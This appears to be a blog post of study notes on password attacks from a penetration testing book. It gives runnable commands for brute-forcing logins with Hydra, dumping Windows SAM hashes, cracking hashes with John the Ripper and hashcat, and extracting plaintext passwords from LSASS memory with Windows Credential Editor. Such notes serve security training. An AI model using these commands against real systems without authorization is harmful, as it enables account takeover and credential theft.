Password Attacks

Source: Georgia Weidman on “Advanced Penetration Test”
(1) Crunch
Tool to bruteforce keyspace

$: crunch 7 7 AB
Bruteforces all 7 character passwords composed of only the characters A and B

(2) ceWL
Tool to map a website and pull potentially interesting words to add to a wordlist

$: cewl -w [words].txt -d 1 -m 5 http://www.[website].com
Depth 1
Minimum length of word is 5 characters

(3) Hydra
Online password cracking tool

$: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3

Offline Password Attacks​

(1) Opening the SAM File
We got access to a backup of the SAM and SYSTEM files with the directory traversal vulnerability.

You can also get access to these files with physical access unless they have a BIOS password in place.

$: bkhive system xpkey.txt
$: samdump2 sam xpkey.txt

(2) John the Ripper
$: john xphashes.txt johnlinuxpasswords.txt –wordlist=passwordfile.txt

(3) oclHashcat
Can use GPUs to crack faster

Online Password Cracking
http://tools.question-defense.com
http://cloudcracker.com

Windows Credential Editor​
Tool to pull plaintext passwords etc out of the memory of the LSASS process
*Have to drop the binary onto the system

wce.exe -w

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s